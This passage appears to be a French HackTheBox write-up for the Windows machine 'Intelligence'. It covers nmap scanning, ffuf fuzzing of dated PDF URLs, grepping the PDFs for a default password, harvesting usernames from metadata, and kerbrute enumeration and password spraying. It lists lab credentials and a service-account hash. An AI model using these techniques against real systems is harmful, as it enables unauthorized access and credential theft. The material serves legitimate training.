class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.2746<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">1991.....91d7 </span></span></code></pre></td></tr></table> </div> </div>HTB | Intelligencehttps://leopoldabgn.github.io/writeups/p/intelligence-htb/Wed, 03 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/intelligence-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Intelligence cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Intelligence</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.248</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Tiffany.Molina : NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">Ted.Graves : Mr.Teddy </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.248 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-03 19:34:02Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:37+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: intelligence.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:dc.intelligence.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>intelligence-DC-CA/domainComponent<span class="o">=</span>intelligence </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2021-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2022-04-19T00:43:16 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 7767953367fbd65d6065dff77ad83e88 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-03T19:35:36+00:00<span class="p">;</span> +7h00m00s from scanner time. </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49666/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49691/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49692/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49710/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49713/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="intelligencehtb">intelligence.htb </h3><p>On découvre un site web sur le port 80 de notre machine.</p> <h3 id="fuzzing-files">Fuzzing files </h3><p>Sur la page d&rsquo;accueil on nous indique un lien vers un fichier :</p> <blockquote> <p><a class="link" href="http://intelligence.htb/documents/2020-01-01-upload.pdf" target="_blank" rel="noopener" >http://intelligence.htb/documents/2020-01-01-upload.pdf</a> Un deuxième lien est présent avec un fichier contenant une autre date.</p> </blockquote> <p>On fait la déduction que d&rsquo;autres files peuvent etre présents, si l&rsquo;on réussi à faire du <strong>fuzzing</strong> avec la date.</p> <p>Dans un premier temps, on génére donc un fichier Python qui parcourt toutes les dates dans le bon format de 2015 à 2022 pour un premier test. On redirige ensuite la liste dans un fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">from datetime import date, timedelta </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">def daterange<span class="o">(</span>start_date: date, end_date: date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> <span class="nv">days</span> <span class="o">=</span> int<span class="o">((</span>end_date - start_date<span class="o">)</span>.days<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> n in range<span class="o">(</span>days<span class="o">)</span>: </span></span><span class="line"><span class="cl"> yield start_date + timedelta<span class="o">(</span>n<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">start_date</span> <span class="o">=</span> date<span class="o">(</span>2015, 1, 1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">end_date</span> <span class="o">=</span> date<span class="o">(</span>2022, 6, 2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> single_date in daterange<span class="o">(</span>start_date, end_date<span class="o">)</span>: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>single_date.strftime<span class="o">(</span><span class="s2">&#34;%Y-%m-%d&#34;</span><span class="o">))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ensuite, on utilise <strong>ffuf</strong> pour faire du fuzzing et récupérer toutes les URL des potentiels fichiers téléchargeables :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ffuf -c -w dates.txt -u <span class="s2">&#34;http://intelligence.htb/documents/FUZZ-upload.pdf&#34;</span> -o results.json -of json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /workspace/Intelligence/dates.txt </span></span><span class="line"><span class="cl"> :: Output file : results.json </span></span><span class="line"><span class="cl"> :: File format : json </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2020-01-01 <span class="o">[</span>Status: 200, Size: 26835, Words: 241, Lines: 209, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-02 <span class="o">[</span>Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-25 <span class="o">[</span>Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-20 <span class="o">[</span>Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 27ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-23 <span class="o">[</span>Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 35ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-22 <span class="o">[</span>Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 37ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-10 <span class="o">[</span>Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 40ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-04 <span class="o">[</span>Status: 200, Size: 27522, Words: 223, Lines: 196, Duration: 49ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-01-30 <span class="o">[</span>Status: 200, Size: 26706, Words: 242, Lines: 193, Duration: 39ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-24 <span class="o">[</span>Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-04 <span class="o">[</span>Status: 200, Size: 26194, Words: 235, Lines: 202, Duration: 21ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-28 <span class="o">[</span>Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 23ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-11 <span class="o">[</span>Status: 200, Size: 25245, Words: 241, Lines: 198, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-17 <span class="o">[</span>Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 29ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-02-23 <span class="o">[</span>Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-05 <span class="o">[</span>Status: 200, Size: 26124, Words: 221, Lines: 205, Duration: 33ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-12 <span class="o">[</span>Status: 200, Size: 27143, Words: 233, Lines: 213, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2020-03-21 <span class="o">[</span>Status: 200, Size: 11250, Words: 157, Lines: 134, Duration: 24ms<span class="o">]</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">2021-03-25 <span class="o">[</span>Status: 200, Size: 27327, Words: 231, Lines: 211, Duration: 22ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-21 <span class="o">[</span>Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 31ms<span class="o">]</span> </span></span><span class="line"><span class="cl">2021-03-27 <span class="o">[</span>Status: 200, Size: 12127, Words: 166, Lines: 141, Duration: 28ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>2709/2709<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">1562</span> req/sec :: Duration: <span class="o">[</span>0:00:01<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span></code></pre></td></tr></table> </div> </div><p>Il faut ensuite parcourir cette liste d&rsquo;url pour télécharger tous les fichiers. En Python, ça nous donne le code suivant :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat ffuf_dl.py </span></span><span class="line"><span class="cl">import json </span></span><span class="line"><span class="cl">import subprocess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">with open<span class="o">(</span><span class="s2">&#34;results.json&#34;</span><span class="o">)</span> as f: </span></span><span class="line"><span class="cl"> <span class="nv">data</span> <span class="o">=</span> json.load<span class="o">(</span>f<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> result in data<span class="o">[</span><span class="s2">&#34;results&#34;</span><span class="o">]</span>: </span></span><span class="line"><span class="cl"> <span class="nv">url</span> <span class="o">=</span> result<span class="o">[</span><span class="s2">&#34;url&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> print<span class="o">(</span>f<span class="s2">&#34;[*] Téléchargement de {url}&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> subprocess.run<span class="o">([</span><span class="s2">&#34;wget&#34;</span>, <span class="s2">&#34;-q&#34;</span>, <span class="s2">&#34;-P&#34;</span>, <span class="s2">&#34;pdfs/&#34;</span>, url<span class="o">])</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans le dossier pdfs/ se trouve une grande quantité de fichiers</p> <h3 id="password-found-in-pdfs">Password found in pdfs </h3><p>J&rsquo;ai utilisé la commande <strong>pdftotext</strong> afin de convertir les pdfs en texte. Ensuite, en affichant le texte de tous les pdfs et en recherchant le mot clé &ldquo;password&rdquo;, on trouve un match ! Le mot de passe : <code>NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="k">for</span> f in *.pdf </span></span><span class="line"><span class="cl"><span class="k">do</span> </span></span><span class="line"><span class="cl"> pdftotext <span class="nv">$f</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl">$ cat *.txt <span class="p">|</span> grep -i password -A3 -B3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">New Account Guide </span></span><span class="line"><span class="cl">Welcome to Intelligence Corp! </span></span><span class="line"><span class="cl">Please login using your username and the default password of: </span></span><span class="line"><span class="cl">NewIntelligenceCorpUser9876 </span></span><span class="line"><span class="cl">After logging in please change your password as soon as possible. </span></span></code></pre></td></tr></table> </div> </div><p>On trouve également le message suivant:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Internal IT Update </span></span><span class="line"><span class="cl">There has recently been some outages on our web servers. Ted has gotten a </span></span><span class="line"><span class="cl">script in place to <span class="nb">help</span> notify us <span class="k">if</span> this happens again. </span></span><span class="line"><span class="cl">Also, after discussion following our recent security audit we are in the process </span></span><span class="line"><span class="cl">of locking down our service accounts. </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-list-from-pdfs-creators">User list from pdfs creators </h3><p>En utilisant <strong>exiftool</strong>, on peut recuperer beaucoup d&rsquo;information sur les PDFs et notamment le nom des createurs ayant généré les pdfs. On peut alors obtenir une liste d&rsquo;utilisateurs potentiels</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">exiftool pdfs/*.pdf <span class="p">|</span> grep -i creator <span class="p">|</span> awk <span class="s1">&#39;{print $3}&#39;</span> </span></span><span class="line"><span class="cl">William.Lee </span></span><span class="line"><span class="cl">Scott.Scott </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Tiffany.Molina &lt;----------- </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Ian.Duncan </span></span><span class="line"><span class="cl">Richard.Williams </span></span></code></pre></td></tr></table> </div> </div><p>Avec kerbrute, on peut vérifier si les utilisateurs existent. Une très grosse partie existe en vérité. Avec nxc on effectue un password spray et on trouve les credentials suivants: <code>intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt </span></span><span class="line"><span class="cl"> __ __ __ </span></span><span class="line"><span class="cl"> / /_____ _____/ /_ _______ __/ /____ </span></span><span class="line"><span class="cl"> / //_/ _ <span class="se">\/</span> ___/ __ <span class="se">\/</span> ___/ / / / __/ _ <span class="se">\ </span></span></span><span class="line"><span class="cl"> / ,&lt; / __/ / / /_/ / / / /_/ / /_/ __/ </span></span><span class="line"><span class="cl">/_/<span class="p">|</span>_<span class="p">|</span><span class="se">\_</span>__/_/ /_.___/_/ <span class="se">\_</span>_,_/<span class="se">\_</span>_/<span class="se">\_</span>__/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Version: dev <span class="o">(</span>n/a<span class="o">)</span> - 09/03/25 - Ronnie Flathers 